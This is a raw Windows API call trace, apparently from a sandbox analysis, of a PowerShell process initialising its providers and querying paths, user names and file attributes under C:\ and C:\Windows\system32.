	[0226.897] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x3270708 | out: lpFileInformation=0x3270708*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0226.897] GetLastError () returned 0xcb
	[0226.897] SetErrorMode (uMode=0x1) returned 0x1
	[0226.897] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10e61c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0226.897] GetLastError () returned 0xcb
	[0226.897] SetErrorMode (uMode=0x1) returned 0x1
	[0226.897] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x32708a8 | out: lpFileInformation=0x32708a8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0226.898] GetLastError () returned 0xcb
	[0226.898] SetErrorMode (uMode=0x1) returned 0x1
	[0226.898] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x528ed0, nSize=0x10eba4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10eba4) returned 0x1
	[0226.898] GetLastError () returned 0xcb
	[0226.898] GetUserNameW (in: lpBuffer=0x5090b0, pcbBuffer=0x10ebac | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10ebac) returned 1
	[0226.899] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3273630*="FileSystem", lpRawData=0x32734ec) returned 1
	[0226.899] GetLastError () returned 0x0
	[0226.900] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0226.900] GetLastError () returned 0xcb
	[0226.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.901] GetLastError () returned 0xcb
	[0226.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.901] GetLastError () returned 0xcb
	[0226.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.901] GetLastError () returned 0xcb
	[0226.902] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x528ed0, nSize=0x10eba4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10eba4) returned 0x1
	[0226.902] GetLastError () returned 0xcb
	[0226.902] GetUserNameW (in: lpBuffer=0x5090b0, pcbBuffer=0x10ebac | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10ebac) returned 1
	[0226.903] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3277720*="Function", lpRawData=0x32775dc) returned 1
	[0226.903] GetLastError () returned 0x0
	[0226.906] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0226.906] GetLastError () returned 0xcb
	[0226.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e5b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.911] GetLastError () returned 0xcb
	[0226.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e568, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.911] GetLastError () returned 0xcb
	[0226.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e568, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.911] GetLastError () returned 0xcb
	[0226.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e568, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.911] GetLastError () returned 0xcb
	[0227.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e5b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.196] GetLastError () returned 0xcb
	[0227.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e568, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.196] GetLastError () returned 0xcb
	[0227.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e568, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.196] GetLastError () returned 0xcb
	[0227.198] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x528ed0, nSize=0x10eba4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10eba4) returned 0x1
	[0227.199] GetLastError () returned 0xcb
	[0227.199] GetUserNameW (in: lpBuffer=0x5090b0, pcbBuffer=0x10ebac | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10ebac) returned 1
	[0227.200] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x32907dc*="Registry", lpRawData=0x3290698) returned 1
	[0227.324] GetLastError () returned 0x0
	[0227.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e5a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.326] GetLastError () returned 0x0
	[0227.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e554, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.326] GetLastError () returned 0x0
	[0227.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e554, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.326] GetLastError () returned 0x0
	[0227.327] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x528ed0, nSize=0x10eba4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10eba4) returned 0x1
	[0227.327] GetLastError () returned 0x0
	[0227.327] GetUserNameW (in: lpBuffer=0x5090b0, pcbBuffer=0x10ebac | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10ebac) returned 1
	[0227.328] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x32945c4*="Variable", lpRawData=0x3294480) returned 1
	[0227.328] GetLastError () returned 0x0
	[0227.330] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0227.330] GetLastError () returned 0xcb
	[0227.333] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0227.333] GetLastError () returned 0xcb
	[0227.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10e5a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0227.334] GetLastError () returned 0xcb
	[0227.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10e554, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0227.334] GetLastError () returned 0xcb
	[0227.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10e554, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0227.335] GetLastError () returned 0xcb
	[0227.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10e554, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0227.335] GetLastError () returned 0xcb
	[0227.540] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x528ed0, nSize=0x10eba4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10eba4) returned 0x1
	[0227.669] GetLastError () returned 0x3
	[0227.669] GetUserNameW (in: lpBuffer=0x5090b0, pcbBuffer=0x10ebac | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10ebac) returned 1
	[0227.670] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x32a24b0*="Certificate", lpRawData=0x32a236c) returned 1
	[0227.805] GetLastError () returned 0x0
	[0227.820] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0227.820] GetLastError () returned 0xcb
	[0227.826] GetLogicalDrives () returned 0x4
	[0227.826] GetLastError () returned 0xcb
	[0227.826] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x10e71c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0227.826] GetLastError () returned 0xcb
	[0227.826] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0227.826] GetLastError () returned 0xcb
	[0227.827] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x5090b0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0227.827] GetLastError () returned 0xcb
	[0227.829] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0227.829] GetLastError () returned 0xcb
	[0227.829] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0227.829] GetLastError () returned 0xcb
	[0227.942] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0227.942] GetLastError () returned 0xcb
	[0227.946] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0227.946] GetLastError () returned 0xcb
	[0227.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x10e564, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0227.947] GetLastError () returned 0xcb
	[0227.947] SetErrorMode (uMode=0x1) returned 0x1
	[0227.947] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x32a93d0 | out: lpFileInformation=0x32a93d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0227.947] GetLastError () returned 0xcb
	[0227.947] SetErrorMode (uMode=0x1) returned 0x1
	[0227.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x10e56c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0227.947] GetLastError () returned 0xcb
	[0227.947] SetErrorMode (uMode=0x1) returned 0x1
	[0227.947] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x32a9564 | out: lpFileInformation=0x32a9564*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0227.947] GetLastError () returned 0xcb
	[0227.947] SetErrorMode (uMode=0x1) returned 0x1
	[0227.955] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0227.955] GetLastError () returned 0xcb
	[0227.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x10e6b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0227.960] GetLastError () returned 0xcb
	[0227.961] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10e630, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0227.961] GetLastError () returned 0xcb
	[0227.961] SetErrorMode (uMode=0x1) returned 0x1
	[0227.961] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x10eab0 | out: lpFileInformation=0x10eab0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0227.962] GetLastError () returned 0xcb
	[0227.962] SetErrorMode (uMode=0x1) returned 0x1
	[0227.962] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10e630, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0227.962] GetLastError () returned 0xcb
	[0227.962] SetErrorMode (uMode=0x1) returned 0x1
	[0227.962] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x10eab0 | out: lpFileInformation=0x10eab0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0227.962] GetLastError () returned 0xcb
	[0227.962] SetErrorMode (uMode=0x1) returned 0x1
	[0227.962] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10e644, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0227.962] GetLastError () returned 0xcb
	[0227.962] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x10e5e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0227.962] GetLastError () returned 0xcb
	[0227.962] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x10e630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0227.962] GetLastError () returned 0xcb
	[0227.962] SetErrorMode (uMode=0x1) returned 0x1
	[0227.962] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x10eab0 | out: lpFileInformation=0x10eab0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0227.963] GetLastError () returned 0xcb
	[0227.963] SetErrorMode (uMode=0x1) returned 0x1
	[0227.963] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x10e630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0227.963] GetLastError () returned 0xcb
	[0227.963] SetErrorMode (uMode=0x1) returned 0x1
	[0227.963] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x10eab0 | out: lpFileInformation=0x10eab0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0227.963] GetLastError () returned 0xcb
	[0227.963] SetErrorMode (uMode=0x1) returned 0x1
	[0227.963] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x10e644, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0227.963] GetLastError () returned 0xcb
	[0227.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x10e5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0227.963] GetLastError () returned 0xcb
	[0228.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x10e630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0228.148] GetLastError () returned 0xcb
	[0228.148] SetErrorMode (uMode=0x1) returned 0x1
	[0228.148] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x10eab0 | out: lpFileInformation=0x10eab0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0228.149] GetLastError () returned 0xcb
	[0228.149] SetErrorMode (uMode=0x1) returned 0x1
	[0228.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x10e630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0228.149] GetLastError () returned 0xcb
	[0228.149] SetErrorMode (uMode=0x1) returned 0x1
	[0228.149] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x10eab0 | out: lpFileInformation=0x10eab0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0228.149] GetLastError () returned 0xcb
	[0228.149] SetErrorMode (uMode=0x1) returned 0x1
	[0228.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x10e644, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0228.149] GetLastError () returned 0xcb
	[0228.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x10e5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0228.149] GetLastError () returned 0xcb
	[0228.149] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x10e63c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0228.150] GetLastError () returned 0xcb
	[0228.150] SetErrorMode (uMode=0x1) returned 0x1
	[0228.150] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x10eabc | out: lpFileInformation=0x10eabc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0228.150] GetLastError () returned 0xcb
	[0228.150] SetErrorMode (uMode=0x1) returned 0x1
	[0228.150] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x10e63c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0228.150] GetLastError () returned 0xcb
	[0228.150] SetErrorMode (uMode=0x1) returned 0x1
	[0228.150] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x10eabc | out: lpFileInformation=0x10eabc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0228.150] GetLastError () returned 0xcb
	[0228.150] SetErrorMode (uMode=0x1) returned 0x1
	[0228.150] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x10e650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0228.150] GetLastError () returned 0xcb
	[0228.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x10e5ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0228.150] GetLastError () returned 0xcb
	[0228.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x10e63c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0228.151] GetLastError () returned 0xcb
	[0228.151] SetErrorMode (uMode=0x1) returned 0x1
	[0228.151] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x10eabc | out: lpFileInformation=0x10eabc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0228.151] GetLastError () returned 0xcb
	[0228.151] SetErrorMode (uMode=0x1) returned 0x1
